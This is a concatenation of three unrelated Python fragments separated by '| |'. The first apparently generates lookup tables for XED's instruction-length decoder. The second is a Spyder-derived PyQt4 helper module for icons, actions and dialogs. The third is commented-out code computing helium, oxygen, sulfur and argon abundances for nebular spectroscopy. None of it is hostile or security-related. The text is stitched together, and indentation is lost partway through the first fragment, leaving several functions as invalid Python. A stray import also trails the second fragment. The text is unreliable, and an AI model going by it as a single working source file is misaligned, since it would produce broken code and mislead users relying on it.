    @param implied_nt: string - optional NT name prepended to the output;
        such an NT is implied and never appears literally in the pattern
        (e.g. OSZ_NONTERM for EOSZ)
    @return: [string] - matching NT names in pattern order, with
        implied_nt first when given
    """
    seq = [implied_nt] if implied_nt else []
    for token in ptrn_wrds:
        # NT invocations appear as NAME() in patterns; drop the parens.
        stripped = token.replace('()', '')
        if stripped in nt_list:
            seq.append(stripped)
    return seq
def gen_nt_seq_lookup(agi, nt_seq, target_op, target_type=None):
    """
    @param nt_seq: [string] - list of strings which are names of the NTs that
    bind the target_op. Nts appear in the same order as they were found
    in instruction's pattern (e.g [OSZ_NONTERM, DF64]
    @param target_op: string - name of the operand that is bound by NTs
    (e.g. EOSZ)
    @param target_type: string - the type of target operand
    (xed_bits_t for example).
    Used when we need to override the type specified in grammar.
    @return: codegen.array_gen_t lookup array which defines a mapping
    from certain operand deciders to the value of target_op
    e.g. a mapping from {OSZ, MOD, REXW} to EOSZ
    This mapping is defined by the sequence of NTs (nt_seq)
    by collapsing individual mapping of each NT into one combined mapping.
    Returns None when any of the per-NT mappings (or their combination)
    turns out to be empty.
    """
    #first NT in sequence is the implicit base one
    #for EOSZ and EASZ. For immediate lookup we don't have such
    #a notion of implicit base NT.
    state_space = agi.common.state_space
    gi = agi.generator_dict[nt_seq[0]]
    # The operand-decider universe shared by all per-NT mappings.
    argnames = generate_lookup_function_basis(gi,state_space)
    base_dict = gen_lookup_dict(agi, nt_seq[0], target_op, argnames)
    if not base_dict:
        return None
    # Mappings for the remaining NTs, in pattern order.
    map_list = []
    for nt_name in nt_seq[1:]:
        lookup_dict = gen_lookup_dict(agi, nt_name, target_op, argnames)
        if not lookup_dict:
            return None
        map_list.append(lookup_dict)
    # Collapse the per-NT mappings into one combined mapping.
    comb_map = combine_mapping_seq(base_dict, map_list)
    if not comb_map:
        return None
    return gen_lookup_array(agi, nt_seq, comb_map, target_op, argnames,
                            target_type)
def gen_lookup_dict(agi, nt_name, target_opname, argnames):
    """Build the value mapping that NT `nt_name` defines for `target_opname`.

    @param nt_name: string - the name of NT that defines the mapping
    @param target_opname: string - the name of the operand the mapping maps
        to (e.g. EOSZ)
    @param argnames: {string -> {string -> Boolean}} - a dict of dicts;
        first key is an operand-decider name, second key is its value:
        argnames['MOD']['0'] is True iff operand decider MOD can be '0'
    @return: list of tuples
        [([{token:string -> index_value:string}], return-value:string)]
        mapping operand-decider values to the target_op value, one entry per
        NT row.

    FIXME: sometimes (ONE() NT) the target_op bound by all different rows
    has the same value (it happens when other operands are bound too). We
    should detect such cases and generate an empty dict so that a constant
    function would be generated for such NTs.
    """
    gi = agi.generator_dict[nt_name]
    state_space = agi.common.state_space
    # Hoisted out of the loop (invariant); also dropped the unused
    # `options` and `operand_storage` locals the original bound here.
    state_dict = agi.common.state_bits
    all_values = []
    for ii in gi.parser_output.instructions:
        # First check if the current rule sets the operand at all; if not,
        # go on to the next rule.
        target_op = None
        for op in ii.operands:
            if is_target_op(agi, op, target_opname):
                target_op = op
                break
        if not target_op:
            continue
        # If the binding operand is a macro, expand it to the real operand.
        if target_op.name.lower() in state_dict:
            op_spec = state_dict[target_op.name.lower()].list_of_str
            found_op = False
            for w in op_spec:
                if w.startswith(target_opname):
                    found_op = True
                    break
            if not found_op:
                ildutil.ild_err("Failed to find operand %s" % str(target_op))
            expansion = w
            target_op = opnds.parse_one_operand(expansion)
        # The operand's RHS is the table's output value for this row.
        if target_op.bits:  # RHS of the 1st operand
            this_row_output = target_op.bits
        else:
            ildutil.ild_err("NTLUF operand %s" % str(target_op))
        # Now get the table index values (operand-decider assignments).
        indices = _generate_lookup_function_indices(ii, state_space, argnames)
        all_values.append((indices, this_row_output))
    return all_values
def get_nt_from_lufname(fname):
    """Strip the 'xed_lookup_function_' prefix and the '_getter' suffix from
    a lookup-function name, leaving the NT name."""
    return fname.replace('xed_lookup_function_', '').replace('_getter', '')
def get_lufn_suffix(array):
    """Return the lookup-function name of `array` without its
    'xed_lookup_function_' prefix."""
    function_name = array.lookup_fn.function_name
    return function_name.replace('xed_lookup_function_', '')
def get_lufn(nt_seq, target_op, flevel=''):
    """Build the lookup-function name for an NT sequence and target operand,
    optionally suffixed with a function level."""
    name_parts = ['xed_lookup_function', '_'.join(nt_seq), target_op]
    if flevel:
        name_parts.append(flevel)
    return '_'.join(name_parts)
def gen_lu_names(nt_seq, target_op, level=''):
    """
    @param nt_seq: List of NT names.
    @type nt_seq: C{[string]}
    @param target_op: Name of bounded operand.
    @type target_op: C{string}
    @return (lu_arr, init_fn, lu_fn):
        Tuple of 3 names: lookup array name, init function name and
        lookup function name.
    """
    joined = '_'.join(nt_seq)
    lookup_array = 'xed_lookup_%s_%s' % (joined, target_op)
    init_function = 'xed_lookup_function_init_%s_%s' % (joined, target_op)
    lookup_function = get_lufn(nt_seq, target_op, flevel=level)
    return (lookup_array, init_function, lookup_function)
def get_luf_name_suffix(luf_name):
    """Strip the 'xed_lookup_function_' prefix from a lookup-function name."""
    return luf_name.replace('xed_lookup_function_', '')
def _is_constant_mapping(val_dict):
"""
@param val_dict:
Defines the mapping, by defining an output value for each row of
constrains. Each row is defined by a dictionary of operand names to
operand values.
@type val_dict:
[ ([ dict(opname:string -> opval:string) ], value:string) ]
The return type of gen_lookup_dict function
@return bool: True if mapping defined by val_dict always returns same
value. And hence we can define a constant function, not dependent on
parameters.
This is relevant for ONE() NT that has same IMM_WIDTH output operand
value for several different index values.
A good question is why it was defined that way.
"""
#check if we have same output values for all rows,
#then we should generate a constant function, independent from parameters
#This happens in ONE() NT for IMM_WIDTH
#ONE() seems to be pretty useless NT.
(_first_indices, first_output) = val_dict[0]
all_same = True
for _indices,out_val in val_dict[1:]:
if out_val != first_output:
all_same = False
break
return all_same
#Parameters:
#nt_seq: [string] - list of NT names that define the mapping
#val_dict: [ ([{token:string -> index_value:string}], return-value:string) ]
#(the type returned by gen_lookup_dict), it defines the mapping
#opname: string - the name of target operand e.g. EOSZ
#argnames: {string -> { string -> Boolean } } a dict of dicts
#optype: string - the type of target op (the return type of the
#lookup function). If optype is specified it is used instead of
#agi's defined operand type for opname. Useful for IMM_WIDTH which is defined
#as xed_uint8_t by grammar, but for ILD purposes should be natural int
#(xed_bits_t), because byte-sized operations are sub-optimal in performance in
#32 or 64 modes.
#Note on argnames (described above): the first key is the operand decider
#name and the second key is the operand decider value, e.g.
#argnames['MOD']['0'] == True iff operand decider MOD can have value '0'
#returns codegen.array_gen_t lookup array that defines the mapping
def gen_lookup_array(agi, nt_seq, val_dict, opname, argnames,
optype=None, flevel=''):
operand_storage = agi.operand_storage
(lu_arr, init_fn, lu_fn) = gen_lu_names(nt_seq, opname, level=flevel)
if not optype:
luf_return_type = operand_storage.get_ctype(opname)
else:
luf_return_type = optype
array= codegen.array_gen_t(lu_arr, type=luf_return_type, target_op=opname)
#check if the | |
# SMlib/utils/qthelpers.py
"""Qt utilities"""
import sys,os
sys.path.append('..'+ os.path.sep + '..' + os.path.sep)
from PyQt4.QtGui import (QAction, QStyle, QWidget, QIcon, QApplication,
QLabel, QVBoxLayout, QHBoxLayout, QLineEdit,
QKeyEvent, QMenu, QKeySequence, QToolButton,
QPixmap, QFileDialog)
from PyQt4.QtCore import (SIGNAL, QObject, Qt, QLocale, QTranslator,
QLibraryInfo, QEvent)
import re
import os.path as osp
# Local import
from SMlib.configs.baseconfig import get_image_path
from SMlib.configs.guiconfig import get_shortcut
from SMlib.utils import programs
from SMlib.py3compat import is_text_string, to_text_string
# Note: How to redirect a signal from widget *a* to widget *b* ?
# ----
# It has to be done manually:
# * typing 'SIGNAL("clicked()")' works
# * typing 'signalstr = "clicked()"; SIGNAL(signalstr)' won't work
# Here is an example of how to do it:
# (self.listwidget is widget *a* and self is widget *b*)
# self.connect(self.listwidget, SIGNAL('option_changed'),
# lambda *args: self.emit(SIGNAL('option_changed'), *args))
def get_icon(name, default=None, resample=False):
    """Return image inside a QIcon object
    default: default image name or icon
    resample: if True, manually resample icon pixmaps for the usual sizes
    (16 up to 512). This is recommended for QMainWindow icons created from
    SVG images on non-Windows platforms due to a Qt bug (see
    http://code.google.com/p/spyderlib/issues/detail?id=1314)."""
    if default is None:
        icon = QIcon(get_image_path(name))
    elif isinstance(default, QIcon):
        # Only fall back to the QIcon object when the image is missing.
        icon_path = get_image_path(name, default=None)
        icon = default if icon_path is None else QIcon(icon_path)
    else:
        icon = QIcon(get_image_path(name, default))
    if not resample:
        return icon
    resampled = QIcon()
    for size in (16, 24, 32, 48, 96, 128, 256, 512):
        resampled.addPixmap(icon.pixmap(size, size))
    return resampled
def get_image_label(name, default="not_found.png"):
    """Return image inside a QLabel object"""
    pixmap = QPixmap(get_image_path(name, default))
    label = QLabel()
    label.setPixmap(pixmap)
    return label
class MacApplication(QApplication):
    """Subclass to be able to open external files with our Mac app"""
    def __init__(self, *args):
        QApplication.__init__(self, *args)
    def event(self, event):
        # macOS delivers files opened through the .app bundle as FileOpen
        # events; re-broadcast them as a signal so the main window can react.
        if event.type() == QEvent.FileOpen:
            fname = str(event.file())
            self.emit(SIGNAL('open_external_file(QString)'), fname)
        # Delegate everything (including FileOpen) to the default handler.
        return QApplication.event(self, event)
def qapplication(translate=True):
    """Return the QApplication instance, creating it if it does not exist."""
    running_as_mac_app = (sys.platform == "darwin"
                          and 'Spyder.app' in __file__)
    app_class = MacApplication if running_as_mac_app else QApplication
    app = app_class.instance()
    if not app:
        # Set Application name for Gnome 3
        # https://groups.google.com/forum/#!topic/pyside/24qxvwfrRDs
        app = app_class(['Spyder'])
    if translate:
        install_translator(app)
    return app
def file_uri(fname):
    """Select the right file uri scheme according to the operating system"""
    # Windows drive-letter paths (e.g. 'C:\\...') need the three-slash form;
    # UNC paths and all non-Windows paths take the plain 'file://' prefix.
    if os.name == 'nt' and re.search(r'^[a-zA-Z]:', fname):
        return 'file:///' + fname
    return 'file://' + fname
QT_TRANSLATOR = None  # module-level cache; keeps the installed QTranslator alive

def install_translator(qapp):
    """Install Qt translator to the QApplication instance"""
    global QT_TRANSLATOR
    if QT_TRANSLATOR is None:
        qt_translator = QTranslator()
        # Load Qt's own UI translations (standard buttons, dialogs) for the
        # current locale from the Qt installation's translations directory.
        if qt_translator.load("qt_"+QLocale.system().name(),
                      QLibraryInfo.location(QLibraryInfo.TranslationsPath)):
            QT_TRANSLATOR = qt_translator # Keep reference alive
    if QT_TRANSLATOR is not None:
        qapp.installTranslator(QT_TRANSLATOR)
def keybinding(attr):
    """Return keybinding"""
    sequence = getattr(QKeySequence, attr)
    # First platform binding for this standard key sequence.
    return QKeySequence.keyBindings(sequence)[0]
def _process_mime_path(path, extlist):
if path.startswith(r"file://"):
if os.name == 'nt':
# On Windows platforms, a local path reads: file:///c:/...
# and a UNC based path reads like: file://server/share
if path.startswith(r"file:///"): # this is a local path
path=path[8:]
else: # this is a unc path
path = path[5:]
else:
path = path[7:]
if osp.exists(path):
if extlist is None or osp.splitext(path)[1] in extlist:
return path
def mimedata2url(source, extlist=None):
    """
    Extract url list from MIME data
    extlist: for example ('.py', '.pyw')
    """
    if source.hasUrls():
        raw_paths = [to_text_string(url.toString()) for url in source.urls()]
    elif source.hasText():
        raw_paths = to_text_string(source.text()).splitlines()
    else:
        raw_paths = []
    pathlist = [path for path in
                (_process_mime_path(raw, extlist) for raw in raw_paths)
                if path is not None]
    # Implicitly return None when nothing usable was dropped.
    if pathlist:
        return pathlist
def keyevent2tuple(event):
    """Convert QKeyEvent instance into a tuple"""
    # Order matches QKeyEvent's constructor so tuple2keyevent can invert it.
    attrs = (event.type(), event.key(), event.modifiers(),
             event.text(), event.isAutoRepeat(), event.count())
    return attrs
def tuple2keyevent(past_event):
    """Convert tuple into a QKeyEvent instance"""
    # Inverse of keyevent2tuple: the tuple holds QKeyEvent's constructor
    # arguments (type, key, modifiers, text, autorep, count) in order.
    return QKeyEvent(*past_event)
def restore_keyevent(event):
    """Normalize *event* (a QKeyEvent or a keyevent2tuple() tuple).

    Returns (event, text, key, ctrl, shift).
    """
    if isinstance(event, tuple):
        _, key, modifiers, text, _, _ = event
        event = tuple2keyevent(event)
    else:
        text = event.text()
        modifiers = event.modifiers()
        key = event.key()
    return (event, text, key,
            modifiers & Qt.ControlModifier,
            modifiers & Qt.ShiftModifier)
def create_toolbutton(parent, text=None, shortcut=None, icon=None, tip=None,
                      toggled=None, triggered=None,
                      autoraise=True, text_beside_icon=False):
    """Create a QToolButton"""
    button = QToolButton(parent)
    if text is not None:
        button.setText(text)
    if icon is not None:
        # Accept either an icon name or a ready-made QIcon.
        button.setIcon(get_icon(icon) if is_text_string(icon) else icon)
    if text is not None or tip is not None:
        button.setToolTip(tip if tip is not None else text)
    if text_beside_icon:
        button.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
    button.setAutoRaise(autoraise)
    if triggered is not None:
        QObject.connect(button, SIGNAL('clicked()'), triggered)
    if toggled is not None:
        QObject.connect(button, SIGNAL("toggled(bool)"), toggled)
        button.setCheckable(True)
    if shortcut is not None:
        button.setShortcut(shortcut)
    return button
def action2button(action, autoraise=True, text_beside_icon=False, parent=None):
    """Create a QToolButton directly from a QAction object"""
    # Default to the action's own parent when none is supplied.
    button = QToolButton(action.parent() if parent is None else parent)
    button.setDefaultAction(action)
    button.setAutoRaise(autoraise)
    if text_beside_icon:
        button.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
    return button
def toggle_actions(actions, enable):
    """Enable/disable actions"""
    # Tolerate actions being None, and None placeholders inside the list.
    for action in (actions or []):
        if action is not None:
            action.setEnabled(enable)
def create_action(parent, text, shortcut=None, icon=None, tip=None,
                  toggled=None, triggered=None, data=None, menurole=None,
                  context=Qt.WindowShortcut):
    """Create a QAction

    parent receives the signal connections; triggered/toggled are callables.
    A toggled slot implies a checkable action.
    """
    action = QAction(text, parent)
    if triggered is not None:
        parent.connect(action, SIGNAL("triggered()"), triggered)
    if toggled is not None:
        parent.connect(action, SIGNAL("toggled(bool)"), toggled)
        # toggled(bool) only fires for checkable actions.
        action.setCheckable(True)
    if icon is not None:
        # Accept either an icon name or a ready-made QIcon.
        if is_text_string(icon):
            icon = get_icon(icon)
        action.setIcon(icon)
    if shortcut is not None:
        action.setShortcut(shortcut)
    if tip is not None:
        action.setToolTip(tip)
        action.setStatusTip(tip)
    if data is not None:
        action.setData(data)
    if menurole is not None:
        action.setMenuRole(menurole)
    #TODO: Hard-code all shortcuts and choose context=Qt.WidgetShortcut
    # (this will avoid calling shortcuts from another dockwidget
    # since the context thing doesn't work quite well with these widgets)
    action.setShortcutContext(context)
    return action
def add_shortcut_to_tooltip(action, context, name):
    """Add the shortcut associated with a given action to its tooltip"""
    shortcut = get_shortcut(context=context, name=name)
    action.setToolTip('%s (%s)' % (action.toolTip(), shortcut))
def add_actions(target, actions, insert_before=None):
    """Add actions to a menu

    A None entry in *actions* inserts a separator; QMenu entries become
    submenus.  When insert_before is given, items are inserted before that
    action instead of appended.
    """
    previous_action = None
    target_actions = list(target.actions())
    if target_actions:
        previous_action = target_actions[-1]
        # Treat a trailing separator as "nothing", so a leading None in
        # *actions* does not produce two separators in a row.
        if previous_action.isSeparator():
            previous_action = None
    for action in actions:
        # Only add a separator when something precedes it.
        if (action is None) and (previous_action is not None):
            if insert_before is None:
                target.addSeparator()
            else:
                target.insertSeparator(insert_before)
        elif isinstance(action, QMenu):
            if insert_before is None:
                target.addMenu(action)
            else:
                target.insertMenu(insert_before, action)
        elif isinstance(action, QAction):
            if insert_before is None:
                target.addAction(action)
            else:
                target.insertAction(insert_before, action)
        # Track the last entry (possibly None) to suppress double separators.
        previous_action = action
def get_item_user_text(item):
    """Get QTreeWidgetItem user role string"""
    # Column 0 carries the user data for the whole item.
    return item.data(0, Qt.UserRole)
def set_item_user_text(item, text):
    """Set QTreeWidgetItem user role string"""
    # Counterpart of get_item_user_text: store on column 0, UserRole.
    item.setData(0, Qt.UserRole, text)
def create_bookmark_action(parent, url, title, icon=None, shortcut=None):
    """Create bookmark action"""
    # Bind url as a default argument so each action opens its own target.
    open_url = lambda u=url: programs.start_file(u)
    return create_action(parent, title, shortcut=shortcut, icon=icon,
                         triggered=open_url)
def create_module_bookmark_actions(parent, bookmarks):
    """
    Create bookmark actions depending on module installation:
    bookmarks = ((module_name, url, title), ...)
    """
    return [create_bookmark_action(parent, url, title)
            for key, url, title in bookmarks
            if programs.is_module_installed(key)]
def create_program_action(parent, text, name, icon=None, nt_name=None):
    """Create action to run a program"""
    if is_text_string(icon):
        icon = get_icon(icon)
    # Some programs ship under a different executable name on Windows.
    if os.name == 'nt' and nt_name is not None:
        name = nt_name
    # Implicitly return None when the program is not installed.
    if programs.find_program(name) is not None:
        return create_action(parent, text, icon=icon,
                             triggered=lambda: programs.run_program(name))
def create_python_script_action(parent, text, icon, package, module, args=None):
    """Create action to run a GUI based Python script

    args: extra command-line arguments (default: none).  A None sentinel is
    used instead of a mutable default list: the old ``args=[]`` default was
    a single shared list, captured by the triggered lambda across all
    actions created without explicit args.
    """
    if args is None:
        args = []
    if is_text_string(icon):
        icon = get_icon(icon)
    # Implicitly return None when the script is not available.
    if programs.python_script_exists(package, module):
        return create_action(parent, text, icon=icon,
                             triggered=lambda:
                             programs.run_python_script(package, module, args))
class DialogManager(QObject):
    """
    Object that keep references to non-modal dialog boxes for another QObject,
    typically a QMainWindow or any kind of QWidget
    """
    def __init__(self):
        QObject.__init__(self)
        # id(dialog) -> dialog; keeps the Python wrapper (and thus the Qt
        # C++ object) alive while the dialog is open.
        self.dialogs = {}
    def show(self, dialog):
        """Generic method to show a non-modal dialog and keep reference
        to the Qt C++ object"""
        # If a dialog with the same window title is already registered,
        # re-show and raise it instead of opening a duplicate.
        for dlg in list(self.dialogs.values()):
            if to_text_string(dlg.windowTitle()) \
               == to_text_string(dialog.windowTitle()):
                dlg.show()
                dlg.raise_()
                break
        else:
            # for/else: runs only when no matching title was found above.
            dialog.show()
            self.dialogs[id(dialog)] = dialog
            # Drop the reference once the dialog is accepted or rejected.
            self.connect(dialog, SIGNAL('accepted()'),
                         lambda eid=id(dialog): self.dialog_finished(eid))
            self.connect(dialog, SIGNAL('rejected()'),
                         lambda eid=id(dialog): self.dialog_finished(eid))
    def dialog_finished(self, dialog_id):
        """Manage non-modal dialog boxes"""
        # Removing the entry releases the last reference held here.
        return self.dialogs.pop(dialog_id)
    def close_all(self):
        """Close all opened dialog boxes"""
        # reject() triggers the 'rejected()' connection, which unregisters.
        for dlg in list(self.dialogs.values()):
            dlg.reject()
def get_std_icon(name, size=None):
    """Get standard platform icon
    Call 'show_std_icons()' for details"""
    if not name.startswith('SP_'):
        name = 'SP_' + name
    icon = QWidget().style().standardIcon(getattr(QStyle, name))
    if size is None:
        return icon
    return QIcon(icon.pixmap(size, size))
def get_filetype_icon(fname):
    """Return file type icon"""
    ext = osp.splitext(fname)[1]
    ext = ext[1:] if ext.startswith('.') else ext
    # Fall back to the platform's generic file icon when no <ext>.png exists.
    return get_icon("%s.png" % ext, get_std_icon('FileIcon'))
class ShowStdIcons(QWidget):
    """
    Dialog showing standard icons
    """
    def __init__(self, parent):
        QWidget.__init__(self, parent)
        layout = QHBoxLayout()
        row_nb = 14
        cindex = 0
        col_layout = None
        for child in dir(QStyle):
            if child.startswith('SP_'):
                if cindex == 0:
                    col_layout = QVBoxLayout()
                icon_layout = QHBoxLayout()
                icon = get_std_icon(child)
                label = QLabel()
                label.setPixmap(icon.pixmap(32, 32))
                icon_layout.addWidget(label)
                icon_layout.addWidget(QLineEdit(child.replace('SP_', '')))
                col_layout.addLayout(icon_layout)
                cindex = (cindex + 1) % row_nb
                if cindex == 0:
                    layout.addLayout(col_layout)
        # BUGFIX: the original only added a column to the main layout when
        # cindex wrapped to 0, so a partially-filled last column (SP_ count
        # not a multiple of row_nb) was silently dropped.
        if cindex != 0 and col_layout is not None:
            layout.addLayout(col_layout)
        self.setLayout(layout)
        self.setWindowTitle('Standard Platform Icons')
        self.setWindowIcon(get_std_icon('TitleBarMenuButton'))
def show_std_icons():
"""
Show all standard Icons
"""
app = qapplication()
dialog = ShowStdIcons(None)
dialog.show()
import sys
| |
+ 0.49 * umath.pow(t4,-0.52) * (umath.exp(-4.544/t4))) / D
#
# y_I4471 = y0_I4471 / (1.0 + g_I4471)
# y_I5876 = y0_I5876 / (1.0 + g_I5876)
# y_I6678 = y0_I6678 / (1.0 + g_I6678)
#
# Magnitude = (3.0/5.0) * (y_I5876 + (1.0/3.0) * y_I4471 + (1.0/3.0) * y_I6678)
#
# elif methodology == 'Liu2000':
#
# if Parameter == 'O2_RecombCorr':
# t4 = data_dict['Temp'] / 10000
# OII_HII = data_dict['OII_HII_7319A']
# OII_RecombCor = 9.36 * umath.pow(t4, 0.44) * OII_HII
# Magnitude = OII_RecombCor
#
# if Parameter == 'N2_RecombCorr':
# t4 = data_dict['Temp'] / 10000
# NIII_HII = data_dict['NIII_HII']
# NII_RecombCor = 3.19 * umath.pow(t4, 0.30) * NIII_HII
# Magnitude = NII_RecombCor
#
# elif methodology == 'Epm2007':
#
# if Parameter == 'O2':
# ne = data_dict['Den']
# t4 = data_dict['Temp'] / 10000
# O2plus_Hplus = data_dict['OIII_HII']
# I7320_IBeta_R = 9.36 * umath.pow(t4, 0.44) * O2plus_Hplus
# logOII_logHII = -12 + umath.log10((data_dict['O2_7319A'] + data_dict['O2_7330A']) / data_dict['H1_4861A'] - I7320_IBeta_R) + 6.895 + 2.44/t4 - 0.58*umath.log10(t4) - umath.log10(1.0 + 0.0047 * ne)
# Magnitude = umath.pow(10, logOII_logHII)
#
# elif methodology == 'Fabian2006':
#
# if Parameter == 'HeII_HII':
# t4 = data_dict['Temp'] / 10000
# ne = data_dict['Den']
#
# y0_I4471 = 2.04 * umath.pow(t4,0.13) * data_dict['He1_4472A'] / data_dict['H1_4861A']
# y0_I5876 = 0.738 * umath.pow(t4,0.23) * data_dict['He1_5876A'] / data_dict['H1_4861A']
# y0_I6678 = 2.58 * umath.pow(t4,0.25) * data_dict['He1_6678A'] / data_dict['H1_4861A']
#
# D = 1.0 + 3110.0 * umath.pow(t4,-0.51) * (1.0/ne)
# g_I4471 = 6.11 * umath.pow(t4,0.02) * (umath.exp(-4.544)) / D
# g_I5876 = (7.12 * umath.pow(t4,0.14) * (umath.exp(-3.776/t4)) + 1.47 * umath.pow(t4,-0.28) * (umath.exp(-4.544/t4))) / D
# g_I6678 = (3.27 * umath.pow(t4,-0.41) * (umath.exp(-3.777/t4)) + 0.49 * umath.pow(t4,-0.52) * (umath.exp(-4.544/t4))) / D
#
#
# y_I4471 = y0_I4471 / (1.0 + g_I4471)
# y_I5876 = y0_I5876 / (1.0 + g_I5876)
# y_I6678 = y0_I6678 / (1.0 + g_I6678)
#
# Magnitude = (3.0/5.0) * (y_I5876 + (1.0/3.0) * y_I4471 + (1.0/3.0) * y_I6678)
#
# elif Parameter == 'HeIII_HII':
# t4 = data_dict['Temp'] / 10000
# y_PPI4686 = 0.084 * umath.pow(t4, 0.14) * data_dict['He2_4686A'] / data_dict['H1_4861A']
# Magnitude = y_PPI4686
#
# elif Parameter == 'OII_HII_7319A':
# t4 = data_dict['Temp'] / 10000
# ne = data_dict['Den']
# logOII_logHII = -12 + umath.log10((data_dict['O2_7319A'] + data_dict['O2_7330A']) / data_dict['H1_4861A']) + 6.895 + 2.44 / t4 - 0.58 * umath.log10(t4) - umath.log10(1 + 0.0047 * ne)
# Magnitude = umath.pow(10, logOII_logHII)
#
# elif methodology == 'PyNeb':
#
# if Parameter == 'HeII_HII':
#
# te = data_dict['Temp']
# ne = data_dict['Den']
#
# self.He1.getIonAbundance()
#
# y0_I4471 = self.He1_atom.getIonAbundance(int_ratio = 100 * data_dict['He1_4472A']/data_dict['H1_4861A'] , tem=te, den=ne, label='He1_4472A')
# y0_I5876 = self.He1_atom.getIonAbundance(int_ratio = 100 * data_dict['He1_5876A']/data_dict['H1_4861A'] , tem=te, den=ne, label='He1_5876A')
# y0_I6678 = self.He1_atom.getIonAbundance(int_ratio = 100 * data_dict['He1_6678A']/data_dict['H1_4861A'] , tem=te, den=ne, label='He1_6678A')
#
# # y0_I4471 = 2.04 * umath.pow(t4,0.13) * data_dict['He1_4472A'] / data_dict['H1_4861A']
# # y0_I5876 = 0.738 * umath.pow(t4,0.23) * data_dict['He1_5876A'] / data_dict['H1_4861A']
# # y0_I6678 = 2.58 * umath.pow(t4,0.25) * data_dict['He1_6678A'] / data_dict['H1_4861A']
#
# D = 1.0 + 3110.0 * umath.pow(t4,-0.51) * (1.0/ne)
# g_I4471 = 6.11 * umath.pow(t4,0.02) * (umath.exp(-4.544)) / D
# g_I5876 = (7.12 * umath.pow(t4,0.14) * (umath.exp(-3.776/t4)) + 1.47 * umath.pow(t4,-0.28) * (umath.exp(-4.544/t4))) / D
# g_I6678 = (3.27 * umath.pow(t4,-0.41) * (umath.exp(-3.777/t4)) + 0.49 * umath.pow(t4,-0.52) * (umath.exp(-4.544/t4))) / D
#
#
# y_I4471 = y0_I4471 / (1.0 + g_I4471)
# y_I5876 = y0_I5876 / (1.0 + g_I5876)
# y_I6678 = y0_I6678 / (1.0 + g_I6678)
#
# Magnitude = (3.0/5.0) * (y_I5876 + (1.0/3.0) * y_I4471 + (1.0/3.0) * y_I6678)
#
#
# return Magnitude
#
# def check_issues(self, magnitude, parameter_type):
#
# #Security check in the case we are getting a negative density:
# if parameter_type == 'density':
# if magnitude != None:
#
# if magnitude <= 0:
# return ufloat(50.0, 50.0)
# else:
# return magnitude
# return magnitude
#
# #Security check in case some flux is missing
# elif parameter_type == 'EmFlux':
# if magnitude[1] == None:
# return None
# else:
# return ufloat(magnitude[1], magnitude[2])
#
# class Chemical_Analysis(direct_Method):
#
# def __init__(self):
#
# direct_Method.__init__(self)
#
# #logSI_OI_Gradient = ufloat(-1.53, 0.05)
# logSI_OI_Gradient = ufloat(-1.78, 0.03)
#
# self.OI_SI = umath.pow(10, -logSI_OI_Gradient)
# self.He1 = RecAtom('He', 1)
# atomicData.setDataFile('he_i_rec_Pal12-Pal13.fits')
#
# def set_element(self, element):
#
# if element == 'Argon':
#
# self.argon_abundance_scheme()
#
# elif element == 'Oxygen':
#
# self.oxygen_abundance_scheme()
#
# elif element == 'Nitrogen':
#
# self.nitrogen_abundance_scheme()
#
# elif element == 'Sulfur':
#
# self.sulfur_abundance_scheme()
#
# elif element == 'Helium':
#
# self.helium_abundance_scheme()
#
# return
#
# def argon_abundance_scheme(self):
#
# #Determine the sulfur density and temperature
# T_SII, T_SIII, ne_SII = self.sulfur_density_scheme()
# T_OIII, T_OII = self.oxygen_temperature_scheme()
#
# #We try to calculate the T_ArIII from the sulfur lines
# T_ArIII = T_SIII
# T_ArIV = T_OIII
#
# #We try to calculate the T_ArIV from the sulfur lines, if not we use the Oxygen ones
# if (T_OIII == None) and (T_SIII != None):
# data_dict = {'Temp' : T_SIII}
# T_OIII_approx = self.empiric_formulae(data_dict, methodology = 'Epm2014', Ion='O3', Parameter = 'TOIII_approx_TSIII')
# T_ArIV = T_OIII_approx
#
# elif (T_SIII == None) and (T_OIII != None):
# data_dict = {'Temp' : T_OIII}
# T_SIII_approx = self.empiric_formulae(data_dict, methodology = 'Epm2014', Ion='S3', Parameter = 'TSIII_approx_TOIII')
# T_ArIV = T_SIII_approx
#
# #Calculate the ArIII abundance
# self.argon_IonAbundance(T_ArIII, ne_SII, Ion = 'Ar3', methodology = 'Haegele2008')
#
# #Calculate the ArIV abundance
# self.argon_IonAbundance(T_ArIV, ne_SII, Ion = 'Ar4', methodology = 'Haegele2008')
#
# def sulfur_density_scheme(self, TempIn = None):
#
# #We use this set up mechanism to calculate the electron density for other elements
# if TempIn == None:
# #Determine the Te[SII] and Te[SIII]
# T_SII = self.temperature_determination(Ion = 'S2', methodology = 'Haegele2008')
# T_SIII = self.temperature_determination(Ion = 'S3', methodology = 'Epm2014')
# else:
# T_SII = None
# T_SIII = TempIn
#
# #Determine ne_SII using the TSIII. If not available use TOIII to calculate TSIII
# #If a TempIn is not available it will use the standard procedure
# if T_SIII != None:
# ne_SII = self.density_determination(Ion = 'S2', Temp = T_SIII, methodology='Epm2014')
# else:
# T_OIII, T_OII = self.oxygen_temperature_scheme()
# data_dict = {}
# data_dict['Temp'] = T_OIII
# T_SIII = self.empiric_formulae(data_dict, methodology = 'Epm2014', Ion = 'S3', Parameter='TSIII_approx_TOIII')
# ne_SII = self.density_determination(Ion = 'S2', Temp = T_SIII, methodology='Epm2014')
#
# return T_SII, T_SIII, ne_SII
#
# def sulfur_abundance_scheme(self):
#
# #Get the sulfur electron density and temperature
# T_SII, T_SIII, ne_SII = self.sulfur_density_scheme(TempIn = None)
#
# self.Properties_dict['nSII'] = ne_SII
#
# #Determine the SII/HII abundance.
# #If the T_SII temperature is available use it. If not T_SII = T_SIII:
# if T_SII != None:
# self.sulfur_IonAbundance(T_SII, ne_SII, Ion = 'S2', methodology = 'Haegele2008')
# else:
# self.sulfur_IonAbundance(T_SIII, ne_SII, Ion = 'S2', methodology = 'Haegele2008')
#
# #Determine the SIII/HII abundance
# # self.sulfur_IonAbundance(T_SIII, ne_SII, Ion = 'S3', methodology = 'Haegele2008')
# self.sulfur_IonAbundance(T_SIII, ne_SII, Ion = 'S3', methodology = 'Vital2015')
#
# #Determine the S/H abundance
# #Include the Argon correction if the ArIV lines were observed
# if (self.Properties_dict['SII_HII'] != None) and (self.Properties_dict['SIII_HII'] != None):
# self.Properties_dict['SI_HI'] = self.Properties_dict['SII_HII'] + self.Properties_dict['SIII_HII']
#
# #Calculate the [SIV] correction factor from the Argon abundance
# #This structures enforces the calculation of the Argon apriori
# data_dict = {}
# data_dict['ArIII_HII'] = self.Properties_dict['ArIII_HII']
